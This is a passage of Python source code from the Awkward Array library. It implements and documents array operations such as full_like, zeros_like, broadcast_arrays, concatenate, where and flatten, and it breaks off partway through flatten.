        # apply to the outermost node of every partition
        pieces = [p.withparameter(parameter, value) for p in converted.partitions]
        result = converted.replace_partitions(pieces)
    else:
        result = converted.withparameter(parameter, value)
    return ak._util.maybe_wrap_like(result, array, behavior, highlevel)
def without_parameters(array, highlevel=True, behavior=None):
    """
    Args:
        array: Data convertible into an Awkward Array.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Returns a new array with all parameters removed from every node of its
    #ak.Array.layout, at any depth. The "new array" is a lightweight shallow
    copy; large data buffers are not duplicated.
    """
    converted = ak.operations.convert.to_layout(
        array, allow_record=True, allow_other=False
    )

    def keep_node(layout):
        # no structural change; keep_parameters=False does the stripping
        return None

    stripped = ak._util.recursively_apply(
        converted, keep_node, pass_depth=False, keep_parameters=False
    )
    return ak._util.maybe_wrap_like(stripped, array, behavior, highlevel)
# Private sentinel for full_like's fill_value meaning "zero of whatever type
# the node holds": full_like checks `fill_value is _ZEROS` to produce empty
# strings/bytestrings and nplike.zeros_like for numeric buffers, which a
# literal 0 would not do for string arrays. Used by zeros_like.
_ZEROS = object()
@ak._connect._numpy.implements("zeros_like")
def zeros_like(array, highlevel=True, behavior=None, dtype=None):
    """
    Args:
        array: Array to use as a model for a replacement that contains only `0`.
        highlevel (bool, default is True): If True, return an #ak.Array;
            otherwise, return a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
        dtype (None or type): Overrides the data type of the result.

    This is the equivalent of NumPy's `np.zeros_like` for Awkward Arrays.

    See #ak.full_like for details, and see also #ak.ones_like.

    (There is no equivalent of NumPy's `np.empty_like` because Awkward Arrays
    are immutable.)
    """
    # With an explicit dtype, a plain 0 fill is converted by full_like;
    # otherwise the _ZEROS sentinel requests type-appropriate zeros
    # (e.g. empty strings for string arrays).
    fill = 0 if dtype is not None else _ZEROS
    return full_like(array, fill, highlevel=highlevel, behavior=behavior, dtype=dtype)
@ak._connect._numpy.implements("ones_like")
def ones_like(array, highlevel=True, behavior=None, dtype=None):
    """
    Args:
        array: Array to use as a model for a replacement that contains only `1`.
        highlevel (bool, default is True): If True, return an #ak.Array;
            otherwise, return a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
        dtype (None or type): Overrides the data type of the result.

    This is the equivalent of NumPy's `np.ones_like` for Awkward Arrays.

    See #ak.full_like for details, and see also #ak.zeros_like.

    (There is no equivalent of NumPy's `np.empty_like` because Awkward Arrays
    are immutable.)
    """
    # Thin delegate: full_like handles structure, strings, and dtype logic.
    return full_like(array, 1, highlevel=highlevel, behavior=behavior, dtype=dtype)
@ak._connect._numpy.implements("full_like")
def full_like(array, fill_value, highlevel=True, behavior=None, dtype=None):
    """
    Args:
        array: Array to use as a model for a replacement that contains only
            `fill_value`.
        fill_value: Value to fill the new array with.
        highlevel (bool, default is True): If True, return an #ak.Array;
            otherwise, return a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
        dtype (None or type): Overrides the data type of the result.

    This is the equivalent of NumPy's `np.full_like` for Awkward Arrays.

    Although it's possible to produce an array of `fill_value` with the structure
    of an `array` using #ak.broadcast_arrays:

        >>> array = ak.Array([[1, 2, 3], [], [4, 5]])
        >>> ak.broadcast_arrays(array, 1)
        [<Array [[1, 2, 3], [], [4, 5]] type='3 * var * int64'>,
         <Array [[1, 1, 1], [], [1, 1]] type='3 * var * int64'>]
        >>> ak.broadcast_arrays(array, 1.0)
        [<Array [[1, 2, 3], [], [4, 5]] type='3 * var * int64'>,
         <Array [[1, 1, 1], [], [1, 1]] type='3 * var * float64'>]

    Such a technique takes its type from the scalar (`1` or `1.0`), rather than
    the array. This function gets all types from the array, which might not be
    the same in all parts of the structure.

    Here is an extreme example:

        >>> array = ak.Array([
        ... [{"x": 0.0, "y": []},
        ...  {"x": 1.1, "y": [1]},
        ...  {"x": 2.2, "y": [1, 2]}],
        ... [],
        ... [{"x": 3.3, "y": [1, 2, None, 3]},
        ...  False,
        ...  False,
        ...  True,
        ...  {"x": 4.4, "y": [1, 2, None, 3, 4]}]])
        >>> ak.to_list(ak.full_like(array, 12.3))
        [[{"x": 12.3, "y": []},
          {"x": 12.3, "y": [12]},
          {"x": 12.3, "y": [12, 12]}],
         [],
         [{"x": 12.3, "y": [12, 12, None, 12]},
          True,
          True,
          True,
          {"x": 12.3, "y": [12, 12, None, 12, 12]}]]

    The `"x"` values get filled in with `12.3` because they retain their type
    (`float64`) and the `"y"` list items get filled in with `12` because they
    retain their type (`int64`). Booleans get filled with True because `12.3`
    is not zero. Missing values remain in the same positions as in the original
    `array`. (To fill them in, use #ak.fill_none.)

    See also #ak.zeros_like and #ak.ones_like.

    (There is no equivalent of NumPy's `np.empty_like` because Awkward Arrays
    are immutable.)
    """
    if dtype is not None:
        # In the case of strings and byte strings,
        # converting the fill avoids a ValueError.
        fill_value = dtype(fill_value)
        # Also, if the fill_value cannot be converted to the dtype
        # this should throw a clear, early, error.
        if dtype is bool:
            # then for bools, only 0 and 1 give correct string behavior
            fill_value = int(fill_value)
    layout = ak.operations.convert.to_layout(
        array, allow_record=True, allow_other=False
    )
    def getfunction(layout):
        # bytestring node, "zero" fill: every entry becomes an empty bytestring
        # (all start/stop offsets are 0 into an empty byte buffer).
        if layout.parameter("__array__") == "bytestring" and fill_value is _ZEROS:
            nplike = ak.nplike.of(layout)
            asbytes = nplike.frombuffer(b"", dtype=np.uint8)
            return lambda: ak.layout.ListArray64(
                ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
                ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
                ak.layout.NumpyArray(asbytes, parameters={"__array__": "byte"}),
                parameters={"__array__": "bytestring"},
            )
        # bytestring node, explicit fill: every entry points at the same
        # encoded copy of fill_value (starts all 0, stops all len(asbytes)).
        elif layout.parameter("__array__") == "bytestring":
            nplike = ak.nplike.of(layout)
            if isinstance(fill_value, bytes):
                asbytes = fill_value
            elif isinstance(fill_value, str) or (
                ak._util.py27 and isinstance(fill_value, ak._util.unicode)
            ):
                # py27 branch: `unicode` is a distinct type from `str` there
                asbytes = fill_value.encode("utf-8", "surrogateescape")
            else:
                asbytes = str(fill_value).encode("utf-8", "surrogateescape")
            asbytes = nplike.frombuffer(asbytes, dtype=np.uint8)
            return lambda: ak.layout.ListArray64(
                ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
                ak.layout.Index64(
                    nplike.full(len(layout), len(asbytes), dtype=np.int64)
                ),
                ak.layout.NumpyArray(asbytes, parameters={"__array__": "byte"}),
                parameters={"__array__": "bytestring"},
            )
        # string node, "zero" fill: every entry becomes an empty string.
        elif layout.parameter("__array__") == "string" and fill_value is _ZEROS:
            nplike = ak.nplike.of(layout)
            asbytes = nplike.frombuffer(b"", dtype=np.uint8)
            return lambda: ak.layout.ListArray64(
                ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
                ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
                ak.layout.NumpyArray(asbytes, parameters={"__array__": "char"}),
                parameters={"__array__": "string"},
            )
        # string node, explicit fill: every entry is str(fill_value).
        elif layout.parameter("__array__") == "string":
            nplike = ak.nplike.of(layout)
            asstr = str(fill_value).encode("utf-8", "surrogateescape")
            asbytes = nplike.frombuffer(asstr, dtype=np.uint8)
            return lambda: ak.layout.ListArray64(
                ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
                ak.layout.Index64(
                    nplike.full(len(layout), len(asbytes), dtype=np.int64)
                ),
                ak.layout.NumpyArray(asbytes, parameters={"__array__": "char"}),
                parameters={"__array__": "string"},
            )
        # numeric leaf: keep the buffer's dtype via zeros_like/ones_like/full_like.
        elif isinstance(layout, ak.layout.NumpyArray):
            nplike = ak.nplike.of(layout)
            original = nplike.asarray(layout)
            if fill_value == 0 or fill_value is _ZEROS:
                return lambda: ak.layout.NumpyArray(
                    nplike.zeros_like(original),
                    layout.identities,
                    layout.parameters,
                )
            elif fill_value == 1:
                return lambda: ak.layout.NumpyArray(
                    nplike.ones_like(original),
                    layout.identities,
                    layout.parameters,
                )
            else:
                return lambda: ak.layout.NumpyArray(
                    nplike.full_like(original, fill_value),
                    layout.identities,
                    layout.parameters,
                )
        else:
            # structural node (lists, records, options): recurse into children
            return None
    out = ak._util.recursively_apply(layout, getfunction, pass_depth=False)
    if dtype is not None:
        # apply the dtype override after filling, to strings first, then values
        out = strings_astype(out, dtype)
        out = values_astype(out, dtype)
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
@ak._connect._numpy.implements("broadcast_arrays")
def broadcast_arrays(*arrays, **kwargs):
    """
    Args:
        arrays: Arrays to broadcast into the same structure.
        left_broadcast (bool): If True, follow rules for implicit
            left-broadcasting, as described below.
        right_broadcast (bool): If True, follow rules for implicit
            right-broadcasting, as described below.
        highlevel (bool, default is True): If True, return an #ak.Array;
            otherwise, return a low-level #ak.layout.Content subclass.

    Like NumPy's
    [broadcast_arrays](https://docs.scipy.org/doc/numpy/reference/generated/numpy.broadcast_arrays.html)
    function, this function returns the input `arrays` with enough elements
    duplicated that they can be combined element-by-element.

    For NumPy arrays, this means that scalars are replaced with arrays with
    the same scalar value repeated at every element of the array, and regular
    dimensions are created to increase low-dimensional data into
    high-dimensional data.

    For example,

        >>> ak.broadcast_arrays(5,
        ...                     [1, 2, 3, 4, 5])
        [<Array [5, 5, 5, 5, 5] type='5 * int64'>,
         <Array [1, 2, 3, 4, 5] type='5 * int64'>]

    and

        >>> ak.broadcast_arrays(np.array([1, 2, 3]),
        ...                     np.array([[0.1, 0.2, 0.3], [10, 20, 30]]))
        [<Array [[ 1,  2,  3], [ 1,  2,  3]] type='2 * 3 * int64'>,
         <Array [[0.1, 0.2, 0.3], [10, 20, 30]] type='2 * 3 * float64'>]

    Note that in the second example, when the `3 * int64` array is expanded
    to match the `2 * 3 * float64` array, it is the deepest dimension that
    is aligned. If we try to match a `2 * int64` with the `2 * 3 * float64`,

        >>> ak.broadcast_arrays(np.array([1, 2]),
        ...                     np.array([[0.1, 0.2, 0.3], [10, 20, 30]]))
        ValueError: cannot broadcast RegularArray of size 2 with RegularArray of size 3

    NumPy has the same behavior: arrays with different numbers of dimensions
    are aligned to the right before expansion. One can control this by
    explicitly adding a new axis (reshape to add a dimension of length 1)
    where the expansion is supposed to take place because a dimension of
    length 1 can be expanded like a scalar.

        >>> ak.broadcast_arrays(np.array([1, 2])[:, np.newaxis],
        ...                     np.array([[0.1, 0.2, 0.3], [10, 20, 30]]))
        [<Array [[ 1,  1,  1], [ 2,  2,  2]] type='2 * 3 * int64'>,
         <Array [[0.1, 0.2, 0.3], [10, 20, 30]] type='2 * 3 * float64'>]

    Again, NumPy does the same thing (`np.newaxis` is equal to None, so this
    trick is often shown with None in the slice-tuple). Where the broadcasting
    happens can be controlled, but numbers of dimensions that don't match are
    implicitly aligned to the right (fitting innermost structure, not
    outermost).

    While that might be an arbitrary decision for rectilinear arrays, it is
    much more natural for implicit broadcasting to align left for tree-like
    structures. That is, the root of each data structure should agree and
    leaves may be duplicated to match. For example,

        >>> ak.broadcast_arrays([            100,   200,        300],
        ...                     [[1.1, 2.2, 3.3],    [], [4.4, 5.5]])
        [<Array [[100, 100, 100], [], [300, 300]] type='3 * var * int64'>,
         <Array [[1.1, 2.2, 3.3], [], [4.4, 5.5]] type='3 * var * float64'>]

    One typically wants single-item-per-element data to be duplicated to
    match multiple-items-per-element data. Operations on the broadcasted
    arrays like

        one_dimensional + nested_lists

    would then have the same effect as the procedural code

        for x, outer in zip(one_dimensional, nested_lists):
            output = []
            for inner in outer:
                output.append(x + inner)
            yield output

    where `x` has the same value for each `inner` in the inner loop.

    Awkward Array's broadcasting manages to have it both ways by applying the
    following rules:

    * If all dimensions are regular (i.e. #ak.types.RegularType), like NumPy,
      implicit broadcasting aligns to the right, like NumPy.
    * If any dimension is variable (i.e. #ak.types.ListType), which can
      never be true of NumPy, implicit broadcasting aligns to the left.
    * Explicit broadcasting with a length-1 regular dimension always
      broadcasts, like NumPy.

    Thus, it is important to be aware of the distinction between a dimension
    that is declared to be regular in the type specification and a dimension
    that is allowed to be variable (even if it happens to have the same length
    for all elements). This distinction is can be accessed through the
    #ak.Array.type, but it is lost when converting an array into JSON or
    Python objects.
    """
    # **kwargs + ak._util.extra keeps the signature Python 2.7-compatible
    # (no keyword-only arguments).
    (highlevel, left_broadcast, right_broadcast) = ak._util.extra(
        (),
        kwargs,
        [("highlevel", True), ("left_broadcast", True), ("right_broadcast", True)],
    )

    inputs = []
    for item in arrays:
        layout = ak.operations.convert.to_layout(
            item, allow_record=True, allow_other=True
        )
        if isinstance(layout, ak.partition.PartitionedArray):
            layout = layout.toContent()
        if not isinstance(layout, (ak.layout.Content, ak.layout.Record)):
            # a scalar: wrap it as a length-1 NumpyArray so it can broadcast
            layout = ak.layout.NumpyArray(ak.nplike.of(*arrays).array([layout]))
        inputs.append(layout)

    def stop_at_leaves(inputs):
        # broadcasting is complete once every input has bottomed out
        if all(isinstance(x, ak.layout.NumpyArray) for x in inputs):
            return lambda: tuple(inputs)
        return None

    behavior = ak._util.behaviorof(*arrays)
    out = ak._util.broadcast_and_apply(
        inputs,
        stop_at_leaves,
        behavior,
        left_broadcast=left_broadcast,
        right_broadcast=right_broadcast,
        pass_depth=False,
        numpy_to_regular=True,
    )
    assert isinstance(out, tuple)
    if highlevel:
        return [ak._util.wrap(x, behavior) for x in out]
    return list(out)
@ak._connect._numpy.implements("concatenate")
def concatenate(
    arrays, axis=0, merge=True, mergebool=True, highlevel=True, behavior=None
):
    """
    Args:
        arrays: Arrays to concatenate along any dimension.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        merge (bool): If True, combine data into the same buffers wherever
            possible, eliminating unnecessary #ak.layout.UnionArray8_64 types
            at the expense of materializing #ak.layout.VirtualArray nodes.
        mergebool (bool): If True, boolean and numeric data can be combined
            into the same buffer, losing information about False vs `0` and
            True vs `1`; otherwise, they are kept in separate buffers with
            distinct types (using an #ak.layout.UnionArray8_64).
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Returns an array with `arrays` concatenated. For `axis=0`, this means that
    one whole array follows another. For `axis=1`, it means that the `arrays`
    must have the same lengths and nested lists are each concatenated,
    element for element, and similarly for deeper levels.
    """
    # Normalize every input to a layout; non-arrays pass through unchanged
    # (allow_other=True) so they can be broadcast later. Records are only
    # allowed when concatenating at an inner axis.
    contents = [
        ak.operations.convert.to_layout(
            x, allow_record=False if axis == 0 else True, allow_other=True
        )
        for x in arrays
    ]
    if not any(
        isinstance(x, (ak.layout.Content, ak.partition.PartitionedArray))
        for x in contents
    ):
        raise ValueError(
            "need at least one array to concatenate"
            + ak._util.exception_suffix(__file__)
        )
    # Resolve a possibly negative axis against the first actual array.
    first_content = [
        x
        for x in contents
        if isinstance(x, (ak.layout.Content, ak.partition.PartitionedArray))
    ][0]
    posaxis = first_content.axis_wrap_if_negative(axis)
    maxdepth = max(
        [
            x.minmax_depth[1]
            for x in contents
            if isinstance(x, (ak.layout.Content, ak.partition.PartitionedArray))
        ]
    )
    if not 0 <= posaxis < maxdepth:
        raise ValueError(
            "axis={0} is beyond the depth of this array or the depth of this array "
            "is ambiguous".format(axis) + ak._util.exception_suffix(__file__)
        )
    # A negative axis must resolve to the same positive axis for every input.
    for x in contents:
        if isinstance(x, ak.layout.Content):
            if x.axis_wrap_if_negative(axis) != posaxis:
                raise ValueError(
                    "arrays to concatenate do not have the same depth for negative "
                    "axis={0}".format(axis) + ak._util.exception_suffix(__file__)
                )
    if any(isinstance(x, ak.partition.PartitionedArray) for x in contents):
        if posaxis == 0:
            # axis=0 with partitioned inputs: chain all partitions end to
            # end, accumulating the running offsets.
            partitions = []
            offsets = [0]
            for content in contents:
                if isinstance(content, ak.partition.PartitionedArray):
                    start = 0
                    # NOTE(review): uses ``__builtins__["zip"]`` instead of
                    # plain ``zip`` — presumably to dodge a shadowed name;
                    # confirm intent (``__builtins__`` is a dict only in
                    # imported modules).
                    for stop, part in __builtins__["zip"](
                        content.stops, content.partitions
                    ):
                        count = stop - start
                        start = stop
                        partitions.append(part)
                        offsets.append(offsets[-1] + count)
                elif isinstance(content, ak.layout.Content):
                    partitions.append(content)
                    offsets.append(offsets[-1] + len(content))
                else:
                    # Scalar input: wrap it as a length-1 partition.
                    partitions.append(
                        ak.operations.convert.from_iter([content], highlevel=False)
                    )
                    offsets.append(offsets[-1] + 1)
            out = ak.partition.IrregularlyPartitionedArray(partitions, offsets[1:])
        else:
            # Inner axis with partitioned inputs: cut every input at the
            # partition boundaries of the first partitioned array, then
            # recursively concatenate slice by slice.
            for content in contents:
                if isinstance(content, ak.partition.PartitionedArray):
                    stops = content.stops
                    slices = []
                    start = 0
                    for stop in stops:
                        slices.append(slice(start, stop))
                        start = stop
                    break
            partitions = []
            offsets = [0]
            for slc in slices:
                newcontents = []
                for content in contents:
                    if isinstance(content, ak.partition.PartitionedArray):
                        newcontents.append(content[slc].toContent())
                    elif isinstance(content, ak.layout.Content):
                        newcontents.append(content[slc])
                    else:
                        newcontents.append(content)
                partitions.append(
                    concatenate(
                        newcontents,
                        axis=axis,
                        merge=merge,
                        mergebool=mergebool,
                        highlevel=False,
                    )
                )
                offsets.append(offsets[-1] + len(partitions[-1]))
            out = ak.partition.IrregularlyPartitionedArray(partitions, offsets[1:])
    elif posaxis == 0:
        # Unpartitioned axis=0: greedily merge runs of mergeable neighbors,
        # falling back to a union whenever two neighbors cannot share buffers.
        contents = [
            x
            if isinstance(x, ak.layout.Content)
            else ak.operations.convert.to_layout([x])
            for x in contents
        ]
        batch = [contents[0]]
        for x in contents[1:]:
            if batch[-1].mergeable(x, mergebool=mergebool):
                batch.append(x)
            else:
                collapsed = batch[0].mergemany(batch[1:])
                batch = [collapsed.merge_as_union(x)]
        out = batch[0].mergemany(batch[1:])
        if isinstance(out, ak._util.uniontypes):
            out = out.simplify(merge=merge, mergebool=mergebool)
    else:
        # Inner axis: broadcast all inputs to a common structure and splice
        # the lists together at depth `posaxis`.
        def getfunction(inputs, depth):
            if depth == posaxis and any(
                isinstance(x, ak._util.optiontypes) for x in inputs
            ):
                # Replace missing lists with empty lists so that they can
                # still participate in the concatenation.
                nextinputs = []
                for x in inputs:
                    if isinstance(x, ak._util.optiontypes) and isinstance(
                        x.content, ak._util.listtypes
                    ):
                        nextinputs.append(fill_none(x, [], axis=0, highlevel=False))
                    else:
                        nextinputs.append(x)
                inputs = nextinputs
            if depth == posaxis and all(
                isinstance(x, ak._util.listtypes)
                or (isinstance(x, ak.layout.NumpyArray) and x.ndim > 1)
                or not isinstance(x, ak.layout.Content)
                for x in inputs
            ):
                nplike = ak.nplike.of(*inputs)
                length = max(
                    [len(x) for x in inputs if isinstance(x, ak.layout.Content)]
                )
                # Promote scalars to lists of one element per output entry.
                nextinputs = []
                for x in inputs:
                    if isinstance(x, ak.layout.Content):
                        nextinputs.append(x)
                    else:
                        nextinputs.append(
                            ak.layout.ListOffsetArray64(
                                ak.layout.Index64(
                                    nplike.arange(length + 1, dtype=np.int64)
                                ),
                                ak.layout.NumpyArray(
                                    nplike.broadcast_to(nplike.array([x]), (length,))
                                ),
                            )
                        )
                # Each output list's length is the sum of the corresponding
                # input lists' lengths.
                counts = nplike.zeros(len(nextinputs[0]), dtype=np.int64)
                all_counts = []
                all_flatten = []
                for x in nextinputs:
                    o, f = x.offsets_and_flatten(1)
                    o = nplike.asarray(o)
                    c = o[1:] - o[:-1]
                    nplike.add(counts, c, out=counts)
                    all_counts.append(c)
                    all_flatten.append(f)
                offsets = nplike.empty(len(nextinputs[0]) + 1, dtype=np.int64)
                offsets[0] = 0
                nplike.cumsum(counts, out=offsets[1:])
                offsets = ak.layout.Index64(offsets)
                # Interleave the flattened contents; the union's tags record
                # which input each value came from, simplified away below
                # when the inputs are mergeable.
                tags, index = ak.layout.UnionArray8_64.nested_tags_index(
                    offsets,
                    [ak.layout.Index64(x) for x in all_counts],
                )
                inner = ak.layout.UnionArray8_64(tags, index, all_flatten)
                out = ak.layout.ListOffsetArray64(
                    offsets, inner.simplify(merge=merge, mergebool=mergebool)
                )
                return lambda: (out,)
            elif any(
                x.minmax_depth == (1, 1)
                for x in inputs
                if isinstance(x, ak.layout.Content)
            ):
                raise ValueError(
                    "at least one array is not deep enough to concatenate at "
                    "axis={0}".format(axis) + ak._util.exception_suffix(__file__)
                )
            else:
                return None
        out = ak._util.broadcast_and_apply(
            contents,
            getfunction,
            behavior=ak._util.behaviorof(*arrays, behavior=behavior),
            allow_records=True,
            right_broadcast=False,
            pass_depth=True,
        )[0]
    return ak._util.maybe_wrap(
        out, ak._util.behaviorof(*arrays, behavior=behavior), highlevel
    )
@ak._connect._numpy.implements("where")
def where(condition, *args, **kwargs):
    """
    Args:
        condition (np.ndarray or rectilinear #ak.Array of booleans): In the
            three-argument form of this function (`condition`, `x`, `y`),
            True values in `condition` select values from `x` and False
            values in `condition` select values from `y`.
        x: Data with the same length as `condition`.
        y: Data with the same length as `condition`.
        mergebool (bool, default is True): If True, boolean and numeric data
            can be combined into the same buffer, losing information about
            False vs `0` and True vs `1`; otherwise, they are kept in separate
            buffers with distinct types (using an #ak.layout.UnionArray8_64).
        highlevel (bool, default is True): If True, return an #ak.Array;
            otherwise, return a low-level #ak.layout.Content subclass.
    This function has a one-argument form, `condition` without `x` or `y`, and
    a three-argument form, `condition`, `x`, and `y`. In the one-argument form,
    it is completely equivalent to NumPy's
    [nonzero](https://docs.scipy.org/doc/numpy/reference/generated/numpy.nonzero.html)
    function.
    In the three-argument form, it acts as a vectorized ternary operator:
    `condition`, `x`, and `y` must all have the same length and
    output[i] = x[i] if condition[i] else y[i]
    for all `i`. The structure of `x` and `y` do not need to be the same; if
    they are incompatible types, the output will have #ak.type.UnionType.
    """
    mergebool, highlevel = ak._util.extra(
        (), kwargs, [("mergebool", True), ("highlevel", True)]
    )
    akcondition = ak.operations.convert.to_layout(
        condition, allow_record=False, allow_other=False
    )
    if len(args) == 0:
        # One-argument form: behave exactly like np.nonzero, after forcing
        # the (rectilinear) condition into plain NumPy buffers.
        nplike = ak.nplike.of(akcondition)
        if isinstance(akcondition, ak.partition.PartitionedArray):
            akcondition = akcondition.replace_partitions(
                [
                    ak.layout.NumpyArray(ak.operations.convert.to_numpy(x))
                    for x in akcondition.partitions
                ]
            )
        else:
            akcondition = ak.layout.NumpyArray(
                ak.operations.convert.to_numpy(akcondition)
            )
        out = nplike.nonzero(ak.operations.convert.to_numpy(akcondition))
        if highlevel:
            return tuple(
                ak._util.wrap(ak.layout.NumpyArray(x), ak._util.behaviorof(condition))
                for x in out
            )
        else:
            return tuple(ak.layout.NumpyArray(x) for x in out)
    elif len(args) == 1:
        raise ValueError(
            "either both or neither of x and y should be given"
            + ak._util.exception_suffix(__file__)
        )
    elif len(args) == 2:
        # Three-argument form: build a two-content union selected by the
        # condition, then simplify it away where the contents are mergeable.
        left, right = [
            ak.operations.convert.to_layout(x, allow_record=False, allow_other=True)
            for x in args
        ]
        good_arrays = [akcondition]
        if isinstance(left, ak.layout.Content):
            good_arrays.append(left)
        if isinstance(right, ak.layout.Content):
            good_arrays.append(right)
        nplike = ak.nplike.of(*good_arrays)
        def getfunction(inputs):
            akcondition, left, right = inputs
            if isinstance(akcondition, ak.layout.NumpyArray):
                npcondition = nplike.asarray(akcondition)
                # Tag 0 (condition != 0) selects `left`; tag 1 selects `right`.
                tags = ak.layout.Index8((npcondition == 0).view(np.int8))
                index = ak.layout.Index64(nplike.arange(len(tags), dtype=np.int64))
                # Scalars are repeated to the full length so both union
                # contents line up position-for-position with the condition.
                if not isinstance(left, ak.layout.Content):
                    left = ak.layout.NumpyArray(nplike.repeat(left, len(tags)))
                if not isinstance(right, ak.layout.Content):
                    right = ak.layout.NumpyArray(nplike.repeat(right, len(tags)))
                tmp = ak.layout.UnionArray8_64(tags, index, [left, right])
                return lambda: (tmp.simplify(mergebool=mergebool),)
            else:
                return None
        behavior = ak._util.behaviorof(akcondition, left, right)
        out = ak._util.broadcast_and_apply(
            [akcondition, left, right],
            getfunction,
            behavior,
            pass_depth=False,
            numpy_to_regular=True,
        )
        return ak._util.maybe_wrap(out[0], behavior, highlevel)
    else:
        raise TypeError(
            "where() takes from 1 to 3 positional arguments but {0} were "
            "given".format(len(args) + 1) + ak._util.exception_suffix(__file__)
        )
def flatten(array, axis=1, highlevel=True, behavior=None):
    """
    Args:
        array: Data containing nested lists to flatten.
        axis (None or int): If None, the operation flattens all levels of
            nesting, returning a 1-dimensional array. Otherwise, it flattens
            at a specified depth. The outermost dimension is `0`, followed
            by `1`, etc., and negative values count backward from the
            innermost: `-1` is the innermost dimension, `-2` is the next
            level up, etc.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Returns an array with one level of nesting removed by erasing the
    boundaries between consecutive lists. Since this operates on a level of
    nesting, `axis=0` is a special case that only removes values at the
    top level that are equal to None.
    Consider the following doubly nested `array`.
    ak.Array([[
    [1.1, 2.2, 3.3],
    [],
    [4.4, 5.5],
    [6.6]],
    [],
    [
    [7.7],
    [8.8, 9.9]
    ]])
    At `axis=1`, the outer lists (length 4, length 0, length 2) become a single
    list (of length 6).
    >>> print(ak.flatten(array, axis=1))
    [[1.1, 2.2, 3.3], [], [4.4, 5.5], [6.6], [7.7], [8.8, 9.9]]
    At `axis=2`, the inner lists (lengths 3, 0, 2, 1, 1, and 2) become three
    lists (of lengths 6, 0, and 3).
    >>> print(ak.flatten(array, axis=2))
    [[1.1, 2.2, 3.3, 4.4, 5.5, 6.6], [], [7.7, 8.8, 9.9]]
    There's also an option to completely flatten the array with `axis=None`.
    This is useful for passing the data to a function that doesn't care about
    nested structure, such as a plotting routine.
    >>> print(ak.flatten(array, axis=None))
    [1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]
    Missing values are eliminated by flattening: there is no distinction
    between an empty list and a value of None at the level of flattening.
    >>> array = ak.Array([[1.1, 2.2, 3.3], None, [4.4], [], [5.5]])
    >>> ak.flatten(array, axis=1)
    <Array [1.1, 2.2, 3.3, 4.4, 5.5] type='5 * float64'>
    As a consequence, flattening at `axis=0` does only one thing: it removes
    None values from the top level.
    >>> ak.flatten(array, axis=0)
    <Array [[1.1, 2.2, 3.3], [4.4], [], [5.5]] type='4 * var * float64'>
    As a technical detail, the flattening operation can be trivial in a common
    case, #ak.layout.ListOffsetArray in which the first `offset` is `0`.
    In that case, the flattened data is simply the array node's `content`.
    >>> array.layout
    <ListOffsetArray64>
    <offsets><Index64 i="[0 4 4 6]" offset="0" length="4"/></offsets>
    <content><ListOffsetArray64>
    <offsets><Index64 i="[0 3 3 5 6 7 9]" offset="0" length="7"/></offsets>
    <content>
    <NumpyArray format="d" shape="9" data="1.1 2.2 3.3 4.4 5.5 6.6 7.7 8.8 9.9"/>
    </content>
    </ListOffsetArray64></content>
    </ListOffsetArray64>
    >>> np.asarray(array.layout.content.content)
    array([1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
    However, it is important to keep in mind that this is a special case:
    #ak.flatten and `content` are not interchangeable!
    """
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    nplike = ak.nplike.of(layout)
    if axis is None:
        # Flatten every level: gather all leaf buffers and concatenate them
        # into one NumpyArray (wrapped by the final return below).
        out = ak._util.completely_flatten(layout)
        assert isinstance(out, tuple) and all(isinstance(x, np.ndarray) for x in out)
        if any(isinstance(x, nplike.ma.MaskedArray) for x in out):
            out = ak.layout.NumpyArray(nplike.ma.concatenate(out))
        else:
            out = ak.layout.NumpyArray(nplike.concatenate(out))
    elif axis == 0 or layout.axis_wrap_if_negative(axis) == 0:
        # axis=0 only removes None values at the top level.
        def apply(layout):
            if isinstance(layout, ak._util.virtualtypes):
                return apply(layout.array)
            elif isinstance(layout, ak._util.unknowntypes):
                return apply(ak.layout.NumpyArray(nplike.array([])))
            elif isinstance(layout, ak._util.indexedtypes):
                return apply(layout.project())
            elif isinstance(layout, ak._util.uniontypes):
                # Only rebuild the union if at least one of its contents can
                # actually carry missing values.
                if not any(
                    isinstance(x, ak._util.optiontypes)
                    and not isinstance(x, ak.layout.UnmaskedArray)
                    for x in layout.contents
                ):
                    return layout
                tags = nplike.asarray(layout.tags)
                index = nplike.array(nplike.asarray(layout.index), copy=True)
                # For each option-type content, mark its missing elements
                # with index -1, then drop all marked elements at once.
                bigmask = nplike.empty(len(index), dtype=np.bool_)
                for tag, content in enumerate(layout.contents):
                    if isinstance(content, ak._util.optiontypes) and not isinstance(
                        content, ak.layout.UnmaskedArray
                    ):
                        bigmask[:] = False
                        bigmask[tags == tag] = nplike.asarray(content.bytemask()).view(
                            np.bool_
                        )
                        index[bigmask] = -1
                good = index >= 0
                return ak.layout.UnionArray8_64(
                    ak.layout.Index8(tags[good]),
                    ak.layout.Index64(index[good]),
                    layout.contents,
                )
            elif isinstance(layout, ak._util.optiontypes):
                # project() drops the missing entries.
                return layout.project()
            else:
                return layout
        if isinstance(layout, ak.partition.PartitionedArray):
            out = ak.partition.IrregularlyPartitionedArray(
                [apply(x) for x in layout.partitions]
            )
        else:
            out = apply(layout)
        return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
    else:
